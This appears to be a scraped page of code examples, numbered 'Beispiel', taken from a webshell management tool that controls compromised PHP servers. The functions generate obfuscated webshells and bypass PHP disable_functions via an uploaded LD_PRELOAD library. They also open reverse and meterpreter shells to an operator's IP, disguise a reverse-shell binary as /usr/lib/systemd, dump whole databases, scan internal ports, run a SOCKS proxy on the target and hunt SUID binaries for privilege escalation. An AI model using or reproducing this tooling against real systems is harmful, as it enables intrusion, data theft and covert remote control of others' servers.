Beispiel #1
0
def set_mode(mode: int, test: bool = False):
    if (mode == 4 and not gget("webshell.ld_preload_path", "webshell", False)):
        disable_func_list = gget("webshell.disable_functions", "webshell")
        if (not gget("webshell.ld_preload_path", "webshell", None)):
            filename = "/tmp/%s.so" % str(uuid4())
            ld_preload_func = send(get_detectd_ld_preload()).r_text.strip()
            upload_result = upload(
                path.join(getcwd(), "auxiliary", "ld_preload_x86_64.so"), filename, True)
            if (not upload_result):
                return
            gset("webshell.ld_preload_path", filename, True, "webshell")
            gset("webshell.ld_preload_func", ld_preload_func, True, "webshell")
            if ("putenv" in disable_func_list):
                print(color.red("\nputenv is disabled.\n"))
                return False
            if (not ld_preload_func):
                print(color.red("\nNo ld_preload function!\n"))
                return False
    if (mode in mode_require_ext_dict):
        ext = mode_require_ext_dict[mode]
        res = send(get_detectd_ext(ext))
        if (not res):
            return False
        text = res.r_text.strip()
        if ("exist" not in text):
            print(color.red(f"\nNo {ext} extension!\n"))
            return False
    if (not test):
        if (mode == 7):
            print(color.yellow(f"\nYou may need to wait 1 second to get the result..\n"))
        print(f"\nSet bypass disable_functions: {mode}-{mode_to_desc_dict[mode]}\n")
        gset("webshell.bypass_df", mode, True, "webshell")
    return True
Beispiel #2
0
def run(find_path: str = "/usr&/bin"):
    """
    av

    (Only for windows) Detect anti-virus software running on the target system.
    ps: Need to run system commands

    Origin: https://github.com/BrownFly/findAV, https://github.com/gh0stkey/avList
    """
    if (not is_windows()):
        print(color.red("\nTarget system isn't windows\n"))
        return
    res = send(get_system_code("tasklist /svc"))
    if (not res or not res.r_text
            or "No system execute function" in res.r_text):
        print(color.red("\nDetect error\n"))
        return
    with open(path.join(gget("root_path"), "auxiliary", "av", "av.json"),
              "r",
              encoding="utf-8") as f:
        av_processes = loads(f.read())
    flag = 0
    print("\n" + color.green(" " * 37 + "Result"))
    for line in res.r_text.split("\n"):
        process = line.split(' ')[0]
        if process in av_processes:
            flag = 1
            print("    %40s     -     %-30s" %
                  (color.cyan(process), color.yellow(av_processes[process])))
    if (not flag):
        print("    %40s     /      %-30s" %
              (color.green('No anti-virus'), color.red('Not found')))
    print()
Beispiel #3
0
def run(host: str,
        username: str,
        password: str,
        dbname: str = "",
        port: int = 0):
    """
    db_init

    Initialize the database connection.
    """
    res = send(get_php(host, username, password, dbname, port))
    if (not res):
        return
    if ("Connect error" in res.r_text):
        print("\n" + color.red(res.r_text.strip()) + "\n")
    else:
        print("\n" + color.green("Connect success"))
        gset("db_connected", True, True, "webshell")
        gset("db_host", host, True, "webshell")
        gset("db_username", username, True, "webshell")
        gset("db_password", password, True, "webshell")
        gset("db_dbname", dbname, True, "webshell")
        gset("db_port", port, True, "webshell")
        info = res.r_text.strip()
        if (info):
            info_list = info.split("\n")
            try:
                gset("db_current_user", info_list[0], True, "webshell")
                gset("db_version", info_list[1], True, "webshell")
                print_db_info()
            except IndexError:
                print("\n" + color.red("Select data error") + "\n")
Beispiel #4
0
def thread_upload(web_file_path: str, data: str, number: int, blocksize: int):
    global UPLOAD_SUCCESS, COLOR_PRINT_LOCK
    retry_time = 5
    try:
        with COLOR_PRINT_LOCK:
            print(color.yellow("[Try] Upload block [%d]" % number))
        if (not UPLOAD_SUCCESS):
            return
        while retry_time:
            res = send(get_php_upload(web_file_path, data, number))
            if (res.r_text.strip() == "success"):
                with COLOR_PRINT_LOCK:
                    print(color.yellow("[Successs] Upload block [%d]" %
                                       number))
                break
            else:
                retry_time -= 1
                with COLOR_PRINT_LOCK:
                    print(color.red("[Failed] Upload block [%d]" % number))
                continue
        if (not retry_time):
            with COLOR_PRINT_LOCK:
                print(color.red("\n[Failed] Upload break [%d]\n" % number))
            UPLOAD_SUCCESS = False
            raise UploadBreakException("")
    except Exception:
        UPLOAD_SUCCESS = False
        raise UploadBreakException("")
Beispiel #5
0
def run(ip: str, ports: str, _type: int = 2, timeout: float = 0.5):
    """
    portscan

    Scan intranet ports.

    eg: portscan {ip} {ports} {_type=[socket|file_get_contents|curl]{1|2|3},default = 2} {timeout=0.5}
    """
    if (_type not in [1, 2, 3]):
        print(color.red("\nType error!\n"))
        return
    php = get_php(_type, ip, ports, timeout)
    res = send(php)
    if (not res):
        return
    port_result = res.r_json()
    # ------------------------------------------
    if (len(port_result[0])):
        print(
            color.green('Open') + ' port:\n' + " " * 4 +
            human_friendly_list_print(sorted(port_result[0])) + '\n')
    if (len(port_result[1])):
        print(
            color.red('Close') + ' port:\n' + " " * 4 +
            human_friendly_list_print(sorted(port_result[1])) + '\n')
    if (len(port_result[2])):
        print(
            color.magenta('Timeout') + ' port:\n' + " " * 4 +
            human_friendly_list_print(sorted(port_result[2])) + '\n')
    print("")
Beispiel #6
0
def run(file_path: str, web_file_path: str = "", force: bool = False):
    """
    upload

    Upload file to target system.

    eg: upload {file_path} {web_file_path=file_name} {force=False}
    """
    flag = True
    if (not web_file_path):
        web_file_path = path.basename(file_path)
        flag = False
    try:
        fp = open(file_path, "rb")
    except FileNotFoundError:
        print("\n" + color.red("Local File not exist") + "\n")
        return
    php = get_php(web_file_path, force)
    res = send(php, files={"file": fp})
    if (not res):
        return
    text = res.r_text.strip()
    if text == "success":
        if (flag):
            print(
                color.green(
                    f"\nUpload {file_path} as {web_file_path} success\n"))
        else:
            print(color.green(f"\nUpload {file_path} success\n"))
        return True
    elif text == "exist":
        print(color.yellow(f"\n{web_file_path} exist\n"))
        return True
    else:
        print("\n" + color.red("Upload error / Privileges not enough") + "\n")
Beispiel #7
0
def run(database: str = "",
        table: str = "",
        local_path: str = "",
        encoding: str = "utf8"):
    """
    db_dump

    Dump a database or a table to a file, Default file name is {database}.sql.

    eg: db_dump {database=current_database} {local_path=doughnuts/target/site.com/{database}.sql} {encoding="utf-8"}
    """
    if (not gget("db_connected", "webshell")):
        print(color.red("Please run db_init command first"))
        return
    database = database if database else gget("db_dbname", "webshell")
    download_path = local_path or gget("webshell.download_path", "webshell")
    if not path.exists(download_path):
        makedirs(download_path)
    file_name = f"{database}.sql" if (not table) else f"{database}.{table}.sql"
    res = send(get_php(database, table, encoding))
    if (not res):
        return
    text = res.r_text.strip()
    content = res.r_content.strip()
    if (len(text) > 0 and res.status_code == 200):
        file_path = path.join(download_path, file_name).replace("\\", "/")
        with open(file_path, "wb") as f:
            f.write(gzinflate(b64decode(content)))
        print("\n" + color.green(f"Dump {database} to {file_name} success") +
              "\n")
    elif ("Error" in res.r_text):
        print("\n" + color.red(res.r_text.strip()) + "\n")
    else:
        print(color.red("\nError\n"))
Beispiel #8
0
def run(lhost: str,
        port: int,
        mode: int = 0,
        fakename: str = "/usr/lib/systemd"):
    """
    reshell

    Bind a local port and wait for target connect back to get a full shell.

    eg: reshell {lhost} {port} {type=[python|upload]{1|2},default = 0 (Python:1 Not Python:2)} {(Only for Mode 2) fakename=/usr/lib/systemd}
    """
    if (is_windows(False) or is_windows()):
        print(color.red(f"Only for both system is linux."))
        return False
    try:
        port = int(port)
    except ValueError:
        port = 23333
    disable_func_list = gget("webshell.disable_functions", "webshell")
    MODE = 1
    print(color.yellow(f"Waring: You are using a testing command...."))
    print(color.yellow(f"        Please make sure Port {port} open...."))
    if (mode == 0):
        if (has_env("python")):
            print(color.green(f"Traget has python environment."))
            MODE == 1
        else:
            print(color.red(f"Traget has not python environment."))
            MODE == 2
    else:
        MODE = int(mode)

    if ("proc_open" in disable_func_list):
        print(color.red("proc_open is disabled... Try Mode 3"))
        return
    if (MODE == 1):
        print(color.yellow(f"Use Mode 1->python"))
        command = get_php(lhost, port)
    else:
        print(color.yellow(f"Use Mode 2->upload"))
        filename = encrypt(f"{lhost}-{port}")
        if not upload(
                path.join(gget("root_path"), "auxiliary", "reshell",
                          "reverse_server_x86_64"), "/tmp/%s" % filename,
                True):
            return
        command = get_system_code(
            f"cd /tmp && chmod +x {filename} && ./{filename} {fakename}",
            False)
    t = Thread(target=delay_send, args=(2, command))
    t.setDaemon(True)
    t.start()
    print(f"Bind port {color.yellow(str(port))}...")
    if (not bind(port, MODE)):
        print(color.red(f"Bind port error."))
    if (MODE == 3):
        res = send(f"unlink('/tmp/{filename}');")
        if (not res):
            return
Beispiel #9
0
def run(file_name: str,
        keyword: str = "POST",
        passwd: str = "",
        salt: str = "",
        _type: int = 1):
    """
    generate

    Generate a webshell using doughnuts encoding (password and salt none is random).

    keyword:
      - GET
      - POST
      - COOKIE
      - HEADER

    _type:
      - 1 : Pudding
      - 2 : Icecream
      - 3 : Popsicle
      - 4 : Gululingbo
    """
    raw_keyword = keyword.upper()
    if (raw_keyword not in keyword_dict):
        print(color.red("\nKeyword error\n"))
        return
    keyword = keyword_dict[raw_keyword]
    if (_type not in type_dict):
        print(color.red("\nType error\n"))
        return
    passwd = str(passwd) if passwd else ranstr(randint(5, 8))
    salt = str(salt) if salt else ranstr(randint(5, 8))
    php = get_php(keyword, passwd, salt, _type)
    file_path, file_name = path.split(path.realpath(file_name))
    file_real_path = path.join(file_path, file_name)
    if (path.exists(file_real_path)):
        print(color.red("\nFile is exist\n"))
        return
    elif (not path.exists(file_path)):
        print(color.red("\nFile path is invalid\n"))
        return
    with open(file_real_path, "w+") as f:
        f.write(php)
    print(
        color.green(
            f"\ngenerate {type_dict[_type]}'s php in {file_real_path}! enjoy it!"
        ))
    print(color.yellow("\nUsage:"))
    print(
        color.yellow(
            f"    Interactive interface    : connect url {raw_keyword} {passwd} doughnuts-{salt}"
        ))
    print(
        color.yellow(
            f"    Non-Interactive interface: doughnuts connect url {raw_keyword} {passwd} doughnuts-{salt}\n"
        ))
Beispiel #10
0
def run():
    """
    db_shell

    Get a temporary sql shell of target system.
    """
    if (not gget("db_connected", "webshell")):
        print(color.red("Please run db_init command first"))
        return
    print(
        color.cyan(
            "Eenter interactive temporary sql shell...\n\nUse 'back' command to return doughnuts.\n"
        ))
    database = gget("db_dbname", "webshell")
    prompt = "mysql (%s) > "
    set_namespace("webshell", False, True)
    wordlist = gget("webshell.wordlist")
    readline.set_wordlist(NEW_SQL_WORDLIST)
    try:
        while gget("loop"):
            print(prompt % color.cyan(database), end="")
            command = readline()
            lower_command = command.lower()
            if (lower_command.lower() in ['exit', 'quit', 'back']):
                print()
                break
            if (command == ''):
                print()
                continue
            if (lower_command.startswith("use ") and len(lower_command) > 4):
                try:
                    temp_database = match("use ([^;]*);?",
                                          lower_command).group(1)
                    res = send(check_database(temp_database))
                    if ("Connect error" in res.r_text):
                        print("\n" + color.red(res.r_text.strip()) + "\n")
                    else:
                        database = temp_database
                        print("\n" + color.green(
                            f"Change current database: {database}") + "\n")
                except (IndexError, AttributeError):
                    print("\n" + color.red("SQL syntax error") + "\n")
            else:
                form = execute_sql_command(command, database)
                if (form == ''):
                    print("\n" +
                          color.red("Connection Error / SQL syntax error") +
                          "\n")
                else:
                    print(execute_sql_command(command, database))
    finally:
        gset("db_dbname", database, True, "webshell")
        readline.set_wordlist(wordlist)
Beispiel #11
0
def run(timeout: float = 2.0):
    """
    check

    Check if each webshell is alive.

    eg: check {timeout=2.0}
    """
    if not exists("webshell.log"):
        print(color.red("No webshell.Log"))
        return 0
    with open("webshell.log", "r") as f:
        for index, line in enumerate(f, 1):
            url, method, pwd, *encode_functions = line.split("|")
            if method == "GET":
                raw_key = "params"
            elif method == "POST":
                raw_key = "data"
            elif method == "COOKIE":
                raw_key = "cookies"
            elif method == "HEADER":
                raw_key = "headers"
            else:
                print(
                    f"[{color.blue(str(index))}] {color.red('Method error')}")
                continue
            check_command = "print(md5(1));"
            encode_pf = gget("encode.pf")
            for func in encode_functions:
                if func in encode_pf:
                    check_command = encode_pf[func].run(check_command)
            params_dict = {"data": {}, "timeout": timeout}
            params_dict[raw_key] = {}
            params_dict[raw_key][pwd] = check_command
            common_text, status_code_text = "", "000"
            try:
                res = post(url, verify=False, **params_dict)
                status_code_text = str(res.status_code)
                if ("c4ca4238a0b923820dcc509a6f75849b" in res.text):
                    common_text = color.green("Alive")
                else:
                    common_text = color.red("Not Alive")
            except exceptions.Timeout:
                common_text = color.yellow("Timeout")
            except exceptions.RequestException:
                common_text = color.red("Request error")
            print(
                f"[{color.blue(str(index))}] [{color.yellow(status_code_text)}] {common_text} {url}"
            )
Beispiel #12
0
def run(id: int = 0):
    """
    load

    Load a webshell from log.

    eg: load {id}
    """
    pf = gget("main.pf")
    root_path = gget("root_path")
    webshell_log_path = path.join(root_path, "webshell.log")
    if (not path.exists(webshell_log_path)):
        print(color.red("No webshell.log"))
        return
    f = open(webshell_log_path, "r+")
    lines = f.readlines()
    try:
        if (id <= 0):
            line_num = pf["show"].run()
            print("choose:>", end="")
            load_id = readline()
            if (load_id.isdigit()):
                load_id = int(load_id)
            else:
                print(color.red("\nInput Error\n"))
                return
        else:
            load_id = id
            line_num = len(lines)
        if load_id <= line_num:
            data = lines[load_id - 1].strip().split("|")
            gset("webshell.from_log", True, namespace="webshell")
            connect = pf["connect"].run(*data)
            if (not connect):
                print(
                    "\nThis webshell seems to no longer working, do you want to delete it?\n\n(YES/no) >",
                    end="")
                flag = input()
                if (flag.lower() in ['n', 'no']):
                    return
                del lines[load_id - 1]
                f.seek(0)
                f.truncate()
                f.write("".join(lines))
        else:
            print(color.red("ID error"))
    finally:
        f.close()
Beispiel #13
0
def run(database: str = "", local_path: str = "", encoding: str = "utf8", blocksize: int = 1000, exclude: str = "", include: str = "", threads: int = 5):
    """
    db_mdump

    Dump a database to a file by block compression and multi threads, Default file name is {database}.sql.
    You can use exclude options to exclude some tables.
    You can also use include options to dump only some tables.

    eg: db_mdump {database=current_database} {local_path=doughnuts/target/site.com/{database}.sql} {encoding="utf-8"} {blocksize=1000} {exclude="",eg="table1,table2"} {include="",eg="table1,table2"} {threads=5}
    """
    global LOCK
    if (not gget("db_connected", "webshell")):
        print(color.red("Please run db_init command first"))
        return
    database = database if database else gget("db_dbname", "webshell")
    download_path = local_path or gget("webshell.download_path", "webshell")
    if not path.exists(download_path):
        makedirs(download_path)
    res = send(get_table_name_php(database))
    if (not res):
        return
    tables = res.r_text.strip()
    with LOCK:
        print(color.yellow(f"\n[Try] Dump {database}\n"))
    with ThreadPoolExecutor(max_workers=threads) as tp:
        all_task = [tp.submit(thread_dump, database, table, encoding, download_path, blocksize, threads) for table in tables.split("\n") if table not in exclude.split(",")] if (
            not include) else [tp.submit(thread_dump, database, table, encoding, download_path, blocksize, threads) for table in tables.split("\n") if table in include.split(",")]
        wait(all_task, return_when=ALL_COMPLETED)
        with LOCK:
            print(color.green(f"\n[Success] Dump {database}\n"))
Beispiel #14
0
def thread_dump(database, table, encoding, download_path, blocksize, threads):
    global LOCK
    table = table if table else "None"
    retry_time = 5
    row_number = -1
    while retry_time and row_number == -1:
        row_number = get_table_row_number(database, table)
        retry_time -= 1
        if (row_number != -1):
            with LOCK:
                print(f"[Retry] fetch {database}.{table} [rows: {row_number}]")
    if (row_number == -1):
        with LOCK:
            print(color.red(f"[Error] fetch {database}.{table}"))
        return
    file_name = f"{database}.{table}.sql"
    file_path = path.join(download_path, file_name).replace("\\", "/")
    with LOCK:
        print(color.yellow(
            f"[Try] fetch {database}.{table} [rows: {row_number}]"))
    with open(file_path, "wb") as f, ThreadPoolExecutor(max_workers=threads) as tp:
        f.write(get_table_construct(database, table, encoding))
        f.flush()
        
        all_task = [tp.submit(get_data, database, table, encoding, offset, blocksize)
                    for offset in range(0, row_number, blocksize)]
        for future in as_completed(all_task):
            result = future.result()
            if (result):
                f.write(future.result())
                f.flush()
        with LOCK:
            print(color.green(
                f"[Success] fetch {database}.{table} [rows: {row_number}]"))
Beispiel #15
0
def run(ip: str, port: str, reverse_type: str = "php"):
    """
    remp

    reverse meterpreter shell to a host from target system.
    eg: reverse {ip} {port} {type=php}

    reverse_type:
      - php(php/meterpreter/reverse_tcp)
      - python(python/meterpreter/reverse_tcp)
      - bash(cmd/unix/reverse_bash)
    """
    reverse_type = str(reverse_type).lower()
    if reverse_type == "php":
        t = get_php_meterpreter(ip=ip, port=int(port))
    elif reverse_type == "python":
        t = get_python_meterpreter(ip=ip, port=int(port))
    elif reverse_type == "bash":
        t = get_bash_cmd(ip=ip, port=int(port))
    else:
        print(color.red("Reverse type Error."))
        return
    sleep(1)
    if (t.isAlive()):
        print(
            f"\nReverse meterpreter shell to {ip}:{port} {color.green('success')}.\n"
        )
    else:
        print(f"\nReverse meterpreter shell {color.red('error')}.\n")
Beispiel #16
0
def run(web_file_path: str):
    """
    write

    Write files directly to the target system by notepad/vi.

    eg: write {web_file_path}
    """
    file_name = path.split(web_file_path)[1]
    file_path = gget("webshell.download_path", "webshell").replace(":", "_")
    if not path.exists(file_path):
        makedirs(file_path)
    real_file_path = path.join(file_path, file_name)
    with open(real_file_path, "w"):
        pass
    open_editor(real_file_path)
    with open(real_file_path, "r") as f:
        result = base64_encode(f.read())
        res = send(
            f"print(file_put_contents('{web_file_path}', base64_decode('{result}')));"
        )
        if (not res):
            return
        text = res.r_text.strip()
        if (match(r"\w+", text) and text != '0'):
            print(color.green(f"\nWrite {web_file_path} success.\n"))
        else:
            print(
                color.red(f"\nWrite {web_file_path} failed.") +
                color.yellow("\n\nResponse:") + f"\n{text}\n")
    remove(real_file_path)
Beispiel #17
0
def run():
    """
    show

    Show log webshells.
    """
    root_path = gget("root_path")
    webshell_log_path = path.join(root_path, "webshell.log")
    if not path.exists(webshell_log_path):
        print(color.red("No webshell.Log"))
        return 0
    with open(webshell_log_path, "r") as f:
        lines = f.readlines()
        for index, line in enumerate(lines, 1):
            data = line.strip().split("|")
            if (len(data) < 3):
                continue
            data[2] = f"$ {data[2]} $"
            encoders = (e for e in data[3:] if ":" not in e)
            extra_params = " ".join(e for e in data[3:] if ":" in e)
            for func in encoders:
                data[2] = f"{func}({data[2]})"
            print(
                f"[{color.cyan(str(index))}] [{color.yellow(data[1])}] {data[0]}  {color.green(data[2])} {extra_params}"
            )
        return len(lines)
Beispiel #18
0
def run(mode: str, *web_file_paths):
    """
    chmod

    (Only for *unix) Changes file(s) mode.

    eg: chmod {mode} {web_file_path}
    """
    if (is_windows()):
        print(color.red("Target system is windows."))
        return
    mode = str(mode)
    if (len(mode) < 4):
        mode = "0" + mode
    for each_file_path in web_file_paths:
        res = send(
            f"print(chmod(base64_decode('{base64_encode(each_file_path)}'), {mode}));"
        )
        if (not res):
            return
        text = res.r_text.strip()
        if len(text):
            print(
                f"\nchmod {each_file_path} {mode} {color.green('success')}\n")
        else:
            print(f"\nchmod {each_file_path} {mode} {color.red('failed')}\n")
Beispiel #19
0
def run(switch: str = ""):
    """
    verbose

    Open / Close verbose info for prompt.

    switch:
        - ON
        - OFF
    """
    switch = switch.upper()
    if (switch in ["ON", "OFF", ""]):
        switch_name = "PROMPT.VERBOSE"
        if switch == "":
            gset(switch_name, not gget(switch_name, default=False))
        elif switch == "ON":
            gset(switch_name, True)
        elif switch == "OFF":
            gset(switch_name, False)
        update_prompt()
        print(
            f"\nSet verbose info: {color.green('On') if gget(switch_name) else color.red('Off')}\n"
        )
    else:
        print(color.red("\nNo this switch\n"))
Beispiel #20
0
def run(web_file_path: str,
        local_path: str = "",
        _use_raw_php_to_zip: bool = True):
    """
    dump

    Package and compress files in a folder and download it.

    eg: dump {web_file_path} {local_path=./site.com/...}
    """
    if _use_raw_php_to_zip:
        php = get_raw_php(web_file_path)
    else:
        php = get_zip_php(web_file_path)
    res = send(php)
    if (not res):
        return
    content = res.r_content
    download_path = local_path or gget("webshell.download_path", "webshell")
    if len(content) and res.status_code == 200:
        file_name = (gget("webshell.netloc", "webshell") + ".zip" if
                     (not len(local_path)) else "")
        if not path.exists(download_path):
            makedirs(download_path)
        file_path = path.join(download_path, file_name).replace("\\", "/")
        with open(file_path, "wb") as f:
            f.write(content)
        print(color.green(f"Downloaded file has been saved to {file_path}"))
    else:
        print(color.red("File not exist / Download error"))
Beispiel #21
0
def run(
    web_file_path: str,
    local_path: str = "",
) -> bool:
    """
    download

    Download file(s) from target system.

    eg: download {web_file_path} {local_path=./site.com/...}
    """
    php = get_php(web_file_path)
    res = send(php)
    if (not res):
        return
    content = res.r_content
    download_path = local_path or gget("webshell.download_path", "webshell")
    if len(content):
        file_name = path.split(web_file_path)[1]
        if not path.exists(download_path):
            makedirs(download_path)
        file_path = path.join(download_path, file_name)
        with open(file_path, "wb") as f:
            f.write(content)
        print(color.green(f"Downloaded file has been saved to {file_path}"))
        return file_path
    else:
        print(color.red("File not exist / Download error"))
        return ''
Beispiel #22
0
def run(database: str):
    """
    db_use

    Change current database.
    """
    if (not gget("db_connected", "webshell")):
        print(color.red("Please run db_init command first"))
        return
    res = send(get_php(database))
    if ("Connect error" in res.r_text):
        print("\n" + color.red(res.r_text.strip()) + "\n")
    else:
        print("\n" + color.green(f"Change current database: {database}") +
              "\n")
        gset("db_dbname", database, True, "webshell")
Beispiel #23
0
def run(web_file_path: str, editor: str = ""):
    """
    write

    Write files directly to the target system by notepad / vi as default or your own editor.

    eg: write {web_file_path} {editor=""}
    """
    file_name = str(uuid4())
    file_path = gget("webshell.download_path", "webshell")
    if not path.exists(file_path):
        makedirs(file_path)
    real_file_path = path.join(file_path, file_name).replace("\\", "/")
    open(real_file_path, 'a').close()
    open_editor(real_file_path, editor)
    with open(real_file_path, "r") as f:
        result = base64_encode(f.read())
        res = send(
            f"print(file_put_contents('{web_file_path}', base64_decode('{result}')));"
        )
        if (not res):
            return
        text = res.r_text.strip()
        if (match(r"\d+", text)):
            print(color.green(f"\nWrite {web_file_path} success.\n"))
        else:
            print(color.red(f"\nWrite {web_file_path} failed.\n"))
    remove(real_file_path)
Beispiel #24
0
def run(port: int = 8888):
    """
    socks

    (Only for *unix) Run a socks5 server on the target system by python.

    eg: socks {port=8888}
    """
    if (is_windows()):
        print(color.red("Target system isn't *unix"))
        return
    flag = has_env("python")
    if flag:
        python = get_python(port)
        pyname = "check.py"
        res = send(
            f"print(file_put_contents('/tmp/{pyname}', base64_decode(\"{base64_encode(python)}\")));"
        )
        if (not res):
            return
        text = res.r_text.strip()
        if not len(text):
            print(color.red("Failed to write file in /tmp directory."))
            return
        t = Thread(target=send,
                   args=(get_system_code(f"python /tmp/{pyname}"), ))
        t.setDaemon(True)
        t.start()
        t2 = Thread(target=delay_send,
                    args=(
                        10.0,
                        f"unlink('/tmp/{pyname}');",
                    ))
        t2.setDaemon(True)
        t2.start()
        sleep(1)
        if (t.isAlive()):
            print(
                f"\nStart socks5 server listen on {port} {color.green('success')}.\n"
            )
        else:
            print(f"\nStart socks5 server {color.red('error')}.\n")
    else:
        print(
            color.red(
                "The target host does not exist or cannot be found in the python environment."
            ))
Beispiel #25
0
def run():
    """
    bobd

    (Only for *unix) Try to bypass open_basedir by ini_set and chdir.
    """
    disable_func_list = gget("webshell.disable_functions", "webshell")
    if (is_windows()):
        print(color.red("Target system isn't *unix"))
        return
    if ("chdir" in disable_func_list or ("ini_set" in disable_func_list and "ini_alter" in disable_func_list)):
        print("\n" + color.red("ini_set/ini_alter or chdir function is disabled") + "\n")
        return
    switch = not gget("webshell.bypass_obd", "webshell", default=False)
    print(
        f"\nbypass open_basedir: {color.green('On') if switch else color.red('Off')}\n")
    gset("webshell.bypass_obd", switch, True, "webshell")
Beispiel #26
0
def run(find_path: str = "/usr&/bin"):
    """
    priv

    (Only for *unix) Find all files with suid belonging to root and try to get privilege escalation tips.
    ps:use & to split find_path

    eg: priv {find_path="/usr&/bin"}
    """
    if (is_windows()):
        print(color.red("\nTarget system isn't *unix\n"))
        return
    print(
        color.yellow(
            f"\nFinding all files with suid belonging to root in {find_path}...\n"
        ))
    phpcode = ""
    priv_tips = {}
    if ("&" in find_path):
        find_paths = find_path.split("&")
    else:
        find_paths = (find_path, )
    for each in find_paths:
        phpcode += get_system_code(
            f"find {each} -user root -perm -4000 -type f 2>/dev/null")
    res = send(phpcode)
    if (not res):
        return
    suid_commands = res.r_text.strip().split("\n")
    if (not suid_commands or "No system execute function" in suid_commands[0]):
        print(color.red("\nFind error\n"))
        return
    with open(path.join(gget("root_path"), "auxiliary", "priv", "gtfo.json"),
              "r") as f:
        priv_tips = loads(f.read())
    for cmd_path in suid_commands:
        cmd = cmd_path.split("/")[-1]
        if (cmd in priv_tips):
            print(
                color.yellow(cmd_path) +
                f" ( https://gtfobins.github.io/gtfobins/{cmd}/ )\n")
            for k, v in priv_tips[cmd].items():
                info = '\n'.join(v)
                print(f"""{color.cyan(k)}\n{color.green(info)}\n""")
Beispiel #27
0
def outside_generate(file_path: str,
                     keyword: str = "POST",
                     passwd: str = "",
                     salt: str = "",
                     _type: int = 1):
    try:
        _type = int(_type)
    except ValueError:
        print(color.red("\nType error\n"))
    run(file_path, keyword, passwd, salt, _type)
Beispiel #28
0
def run():
    """
    db_dbs

    Output all databases.
    """
    if (not gget("db_connected", "webshell")):
        print(color.red("Please run db_init command first"))
        return
    print(execute_sql_command("show databases;", ""))
Beispiel #29
0
def run():
    """
    db_info

    Output database information.
    """
    if (not gget("db_connected", "webshell")):
        print(color.red("Please run db_init command first"))
        return
    print_db_info()
Beispiel #30
0
def run(database: str = ""):
    """
    db_tables

    Output all tables of a database.
    """
    if (not gget("db_connected", "webshell")):
        print(color.red("Please run db_init command first"))
        return
    database = database if database else gget("db_dbname", "webshell")
    print(execute_sql_command("show tables;", database))